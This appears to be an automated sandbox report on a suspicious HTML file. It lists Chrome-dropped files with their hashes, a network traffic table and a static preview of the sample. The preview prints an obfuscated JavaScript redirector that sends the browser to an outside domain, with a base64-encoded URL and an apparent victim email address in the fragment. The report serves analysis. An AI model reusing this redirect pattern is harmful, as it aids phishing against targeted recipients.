Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	139
Entropy (8bit):	4.373166287857422
Encrypted:	false
SSDEEP:	3:tUKCFLb+ckNjKWZmwv38FLeXAbhR1V8s8FLeWFUFhhR1WGv:mXFX+11ZmwP8Fkg7Vv8Fuv7tv
MD5:	35ED30B7A51BE610855E8AEE13D7D533
SHA1:	4FFE28BA9E3BAB5E222435BE52DE1B579FF00108
SHA-256:	B80239170E9C2C6B24D372255504FBDF767DA86E59269915CA9DFAD5DC703262
SHA-512:	008844DC355C5B477B1532BA6D58725A82273B63ABD619AF87C6A153E0FFC5EB6D194A1D9CB22D2762949047992CB99DBFE02694477665319FA653DED9C15732
Malicious:	false
Preview:	2021/05/12-21:52:09.622 1990 Recovering log #3.2021/05/12-21:52:09.672 1990 Delete type=0 #3.2021/05/12-21:52:09.673 1990 Delete type=3 #2.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000004 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	50
Entropy (8bit):	5.028758439731456
Encrypted:	false
SSDEEP:	3:Ukk/vxQRDKIVmt+8jzn:oO7t8n
MD5:	031D6D1E28FE41A9BDCBD8A21DA92DF1
SHA1:	38CEE81CB035A60A23D6E045E5D72116F2A58683
SHA-256:	B51BC53F3C43A5B800A723623C4E56A836367D6E2787C57D71184DF5D24151DA
SHA-512:	E994CD3A8EE3E3CF6304C33DF5B7D6CC8207E0C08D568925AFA9D46D42F6F1A5BDD7261F0FD1FCDF4DF1A173EF4E159EE1DE8125E54EFEE488A1220CE85AF904
Malicious:	false
Preview:	V........leveldb.BytewiseComparator...#...........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\f5b31b92-6d7d-4c7b-9a6a-da176284aad8.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	5636
Entropy (8bit):	5.177076789923533
Encrypted:	false
SSDEEP:	96:nlC/o32HyevLnxcV1ok0JCSuRWL8VbOTQVuwn:nlCa2FcO4tY6
MD5:	9A9361B4BA9A18DF770AC6B9BFAA9357
SHA1:	8A96EFA2EF0B88EF9A7F1524DE0EF70E5F9268A2
SHA-256:	1FE17CD1219475B950A561B3047288664958680563D22331FB79275FCE42A91E
SHA-512:	8840CB9A2E5216C48D7B2AC73FB858EB91410985A0AC8AD42D3BD990DEF14E3B6764D767927C36BAE44EAD9B3422609D84A9D9F83307B7355A12497F12EDA1D0
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13265355122524508","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\fa4356d7-5b45-446c-9f69-6b7c44a6657e.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	6089
Entropy (8bit):	5.180876015152602
Encrypted:	false
SSDEEP:	96:nlCTct32HyevLnxcV3ok0JCSuRkwRyRWL8LYbOTQVuwn:nlCU2Fcc4tLwY5
MD5:	5D86732CB8821639CBBC982C42F585EE
SHA1:	93DBD5CE0474EB757739ED935F87AB96D9DB3A43
SHA-256:	57858F995FF78A66443599C64AB15D8551AF3C436DC25F1CA2F4F80341FEB313
SHA-512:	5C0A598A8E41CE6F105FF88802BC2A0C40681E0C56A6A340056A552A9D4249130049C20E923FD43F0BFC3E8A0FBC2A2E26CAC9DB9937EA2865831B3AF0CB97F5
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13265355122524508","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.2043246298911
Encrypted:	false
SSDEEP:	6:mXD4q2PWXp+N23iKKdKfrzAdIFUtp8DvsZmwP8DPkwOWXp+N23iKKdKfrzILJ:scva5Kk9FUtp8Q/P8z5f5Kk2J
MD5:	56D3B50BE6CD2C4DD82C46F7950B7DFB
SHA1:	CCD410E292191BCFB913C9AAD7DF59D78DEB847F
SHA-256:	38E655A9624F0BC253D113E6FD1A79CE0D62F84FB49F8F03FA9EEC4BD39E73F7
SHA-512:	33AD54A465A62189FD1D3C15AC4A0FD91145D064E7C126B19AF03B784873FC14CDAF48339202E71032CAC2ADB2022FF5936FEB49238B604DC210DCA2EBF61257
Malicious:	false
Preview:	2021/05/12-21:52:10.312 1894 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2021/05/12-21:52:10.315 1894 Recovering log #3.2021/05/12-21:52:10.316 1894 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	3.138546519832722
Encrypted:	false
SSDEEP:	3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
MD5:	DE9EF0C5BCC012A3A1131988DEE272D8
SHA1:	FA9CCBDC969AC9E1474FCE773234B28D50951CD8
SHA-256:	3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
SHA-512:	CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.8150724101159437
Encrypted:	false
SSDEEP:	3:Yx7:4
MD5:	C422F72BA41F662A919ED0B70E5C3289
SHA1:	AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
SHA-256:	02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
SHA-512:	86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
Malicious:	false
Preview:	85.0.4183.121

C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	0.45488079341118026
Encrypted:	false
SSDEEP:	3:8EflOdw/l:8h6t
MD5:	703D75F4FFCF6A135C2F68EB080A023C
SHA1:	4156F08C857ED9E69CA9D5DBD50922144DA67907
SHA-256:	12EB99A4E08344A943546D1D8D4B30453AA9889CC50CF987690D607E6AD4762E
SHA-512:	6BBBA1320728490963025F3EF47707B4BF95282FF4E45B2F6442AA0B473E2376851DB1C64BB6B8A9C627C9F03E216C459BE8547E5FA50F760E594E25D5C3F85C
Malicious:	false
Preview:	.'..(......................................................................................................................................................................................................................................................................-. /.........................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\9.22.0\Indexing in Progress Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Preview:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir5388_274931714\Ruleset Data Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	208920
Entropy (8bit):	4.964307261909652
Encrypted:	false
SSDEEP:	3072:gzChBJeloN++/mYWcT8WSkb1RqmYb8zpoPo/smfgbpxT0C0oUBXrvzpnuidAut:5clEHRAqggCyIW1
MD5:	A96F63877D2B8648563905C60513B9F0
SHA1:	EE63F5F68E176DCEA8416C9877F09533C4E5498E
SHA-256:	B5A3D515B1673D134B197878D681C0CC8290BC476EB69D69EF27FF9669EC2E80
SHA-512:	C137035D92E4161FF55AF447D61F7F61E9FB8812EF0D32649011A6D7A07AEBA317B4197CF0205B37B755FACF7A1ABCA586507A1B825BC2FD4194E8306DB4E008
Malicious:	false
Preview:	........................$...,........C..................................................p.......P...........,...........................geips....... n..........lgoog........R..........ozama...................onwod.......h...(.......g.bat.......<...@.......uotpo...........X.......ennab...................nozam............e..l....E......................-.................l...P...........,.........................................\|.......h...p...H...,...........\...X...T...P......H.......@...<...8.......d...,...(...$... ...............,.........................................................................`...D...........................................................\|...x...t......l...h...d...`.......X.......P...L...\...D...@...<...8...0...0.............. ...........................................`..................0...........................................................................h.......H...,.......x......p...l...h...d...`...\...X...T...P...L...H...

C:\Users\user\AppData\Local\Google\Chrome\User Data\afdf7848-2aa1-4206-a225-ee8e203a028f.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	160614
Entropy (8bit):	6.0509565104651255
Encrypted:	false
SSDEEP:	3072:NoR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:qPVVLRPZ0RaqfIlUOoSiuRO
MD5:	8E3F92AEAE74366F3CA281E3E0ED333C
SHA1:	4B439AC564704024E6B816F6C5FB6B984751C26D
SHA-256:	E203BCF52957BCC6437CDCB33FA9DA5DA531C1AF2D9F470B652B11016607D0C6
SHA-512:	8F92827A1B1C055D293F0CBEA391DD83CCB841809853DAF104588E4A0D2B19342F0B12762E0992171938E9E323C5DA6A6A53581E8856A77E02777C04528BF70F
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\c41ff449-9267-44a2-a707-6ba9f35e8501.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	160510
Entropy (8bit):	6.050638782898007
Encrypted:	false
SSDEEP:	3072:OoR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:RPVVLRPZ0RaqfIlUOoSiuRO
MD5:	4F90EA0B45AED7B5DE5D2EEC8A09A205
SHA1:	6FE2BFCF8086279B2E095181314700EC465D9796
SHA-256:	B4BA101C856A20BAA6EDBE6601D7098642F92E891BA9502D712390D08766DA28
SHA-512:	4F8DA16B5B4ABD6E12F221E5CDAF544239F9EC35F346C29113969D6909555D4B137AB398226280AD271480EF0789D2FC269768B5C7A6DBD0EDE73EE55E273E30
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\c6dc3c91-2399-4fec-bfb1-369dae90cf33.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	160873
Entropy (8bit):	6.051548937737252
Encrypted:	false
SSDEEP:	3072:FoR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:iPVVLRPZ0RaqfIlUOoSiuRO
MD5:	C1F7D0ADC78425EB419826D22438A5EC
SHA1:	05DE98023E733FF1955CA2D157D10487B550081E
SHA-256:	32338967D5FF4B0B5D5311E395BB7EDE2165902519E34134C7D3F2F560411C50
SHA-512:	0619E18489239EE6B579AD362FDA21BFDE9EC130C58B135E8F865ACC4CA4E686D36EF3EE695B148CA30676288DDDC5FE3F7846FF628688BE9DBB4B25812EA3E4
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\d55cf44f-34d8-4315-aee1-e190c063472a.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	168979
Entropy (8bit):	6.080962641948764
Encrypted:	false
SSDEEP:	3072:yp8oR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:QDPVVLRPZ0RaqfIlUOoSiuRO
MD5:	A7B584DB00C69EE69B47649C877B3AA9
SHA1:	3EAD97A74070B55A029DBF601305AE8DF0F9270B
SHA-256:	9040D8BDE7F1D378F9655E4BDD59A0D07ACD2D2C49955A16D7F1C40D94BAD51A
SHA-512:	C7FD7ACBF2D7EEE3DD906508614A4839CE6144F34682287927999A6E4AD97C41BD00BB1FF3AC1A4F29C2A0839B451C0EB9852428DF0516A40D54B6E60E615732
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\e59320df-7817-4289-a16d-73186a326064.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	168979
Entropy (8bit):	6.080963222309603
Encrypted:	false
SSDEEP:	3072:yrToR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:q8PVVLRPZ0RaqfIlUOoSiuRO
MD5:	D4974BD96E4C7185FAC1895138CB6AC4
SHA1:	D0661041D0FA05D343B4AA0020778803B6CEFABD
SHA-256:	B43B62236170AA41FDE3D9BC8200966E56ACD89D2208BDC35083485E8B29CF13
SHA-512:	DC12B15C4EAF4E71FE01272C91F1CF8459897E70D2407715A101BD6AA0E22B46D2D59029FDC7754E7DC27F400C731618A77D05226F697931E491B9B1CC3B353E
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\e64c5cba-7a99-482e-ae48-f6dd6738bb12.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	168979
Entropy (8bit):	6.08096218031367
Encrypted:	false
SSDEEP:	3072:ywhoR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:JmPVVLRPZ0RaqfIlUOoSiuRO
MD5:	E6C4F4AFB7271A2168E09D4315F2F44A
SHA1:	65DC325BA8397088F6A0A6B59DF1AB2FF16BEF20
SHA-256:	170CA3048E759E5B212FE6A84684D935A65F3344BC079189EC26C57531CEE5E3
SHA-512:	5AAE0759485DB58C59B22A5D7F0D4A89C0D71B9A7B3F9B783702354EABEB501030949D8A6F1B3F4D9714FF882F5A6554562C9BC542A761D4EE790D60874A6B34
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Google\Chrome\User Data\eb6ffa7a-063a-4ac9-be8f-c1b8ae0820f6.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	160959
Entropy (8bit):	6.051701725310719
Encrypted:	false
SSDEEP:	3072:soR1HVDHZLeWnVlPVfx2vDFcbXafIB0u1GOJmA3iuRO:zPVVLRPZ0RaqfIlUOoSiuRO
MD5:	5BE9186152112108D20918618E277432
SHA1:	1E72C75A91B9F4D3C4E3FE6FD21AFD6EC9E6EB01
SHA-256:	B32EAA0EBA95A6357434C5AFED62625B41F5B37526399A27068388F3A5359195
SHA-512:	4787A3AC59AEE85091D13BB5F477969E150C2A8532403880280D9C698E011DFE6D538DB09FE0C600C9A0EA8486C19C6F0AFDC770999CFD8F395B32170A35D94B
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.620881525208161e+12,"network":1.620849127e+12,"ticks":96214821.0,"uncertainty":4670888.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016293962"},"plugins":{"metadata":{"adobe-flash-player":{"displ

C:\Users\user\AppData\Local\Temp\0946a50c-a2d6-41bf-af35-db70a7e80096.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

Static File Info

General
File type:	HTML document, ASCII text, with no line terminators
Entropy (8bit):	5.192978905010925
TrID:
File name:	5781525.html
File size:	279
MD5:	9bf051dc4c81afeaeff5030f34e53fd4
SHA1:	607b98c2ce9abd3a92d1734065a2a8844609e2c5
SHA256:	18914ce325d9f374223492b1f48c41db41a0e9c0c8461f42522c76bd8bfb4a68
SHA512:	1aae5c02f613152840a9a6df9c5327bf0733f744626658fcc09a7dca2741b79a82565d3f24fb64012c6d899bb9dee6635cfc38a6b8ba55191e71db95e42d239f
SSDEEP:	3:g/O9O7YRmc7LAWytVjT76A6V43x7wQJTQAvwYd0TegAjnQ6nALDzTzdWOP+b/9Fe:S0/7LAdjv27ajXAIk6ALPdKBpujMPBYb
File Content Preview:	<script language="javascript">document.write(unescape('%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3Dhttp://Esd.rwbdg.com/#aHR0cHM6Ly93cml0ZXJseS5jYS8jcGhlZWtlQGVzZC53YS5nb3Y=

File Icon


Icon Hash:	e8d6a08c8882c461

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 21:52:06.808543921 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:06.810569048 CEST	49718	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:06.852170944 CEST	49720	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:07.011847973 CEST	80	49717	103.120.64.61	192.168.2.3
May 12, 2021 21:52:07.011919975 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:07.012767076 CEST	49717	80	192.168.2.3	103.120.64.61
May 12, 2021 21:52:07.015609980 CEST	80	49718	103.120.64.61	192.168.2.3
